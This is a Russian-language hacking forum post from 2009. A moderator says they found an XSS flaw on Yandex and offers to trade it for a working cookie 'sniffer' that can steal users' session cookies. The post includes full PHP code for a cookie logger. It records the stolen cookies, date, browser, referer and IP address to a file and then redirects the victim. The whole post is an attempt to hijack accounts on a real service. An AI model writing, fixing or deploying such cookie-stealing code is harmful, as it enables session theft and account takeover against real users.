26.09.2009, 21:41
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Активная xss на Яндекс
нашел полуактивную xss на яндекс. Пытаюсь подставить сниффер, не получается, вернее при запросе (document.cookie) все кукисы выдаются, а при замене запроса на сниффер, кукисы на сниффер не приходят.
Готов поделиться xss с тем, кто подскажет работающий сниффер для яндекса (поделюсь xss после проверки снифа), использовал стандартный от Kaniq и этот сниф, но кукисы не пришли
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING"));
$Date = date("d-m-y H:i:s", time());
$browser = getenv("HTTP_USER_AGENT");
$ref = getenv("HTTP_REFERER");
$ip = getenv("REMOTE_ADDR");
$text = "
$Cookies:
$Date:
$browser:
$ref:
$ip:
$query";
$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);
header('Location: http://somesite.ru');
?>
На майле сниффер работает, на яндексе не работает. 
Подсказка сниффера тут, помощь в реализации в аську.
Последний раз редактировалось satana-fu; 28.09.2009 в 15:42..
|
|
|